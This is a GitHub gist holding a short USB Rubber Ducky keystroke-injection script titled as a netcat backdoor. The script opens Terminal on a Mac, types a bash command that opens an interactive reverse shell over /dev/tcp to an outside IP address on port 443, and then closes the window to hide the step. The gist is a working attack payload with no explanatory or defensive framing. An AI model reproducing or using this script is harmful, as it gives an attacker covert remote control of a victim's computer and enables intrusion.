Skip to content

Instantly share code, notes, and snippets.

@jgamblin
Created November 30, 2016 00:10
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save jgamblin/348254c8d3e9b94f9214e9ad5473a44e to your computer and use it in GitHub Desktop.
Save jgamblin/348254c8d3e9b94f9214e9ad5473a44e to your computer and use it in GitHub Desktop.
No Persistent NetCat Backdoor For Rubber Ducky
DELAY 2000
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING bash -i >& /dev/tcp/192.241.157.75/443 0>&1 &
DELAY 500
ENTER
DELAY 500
GUI Q
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment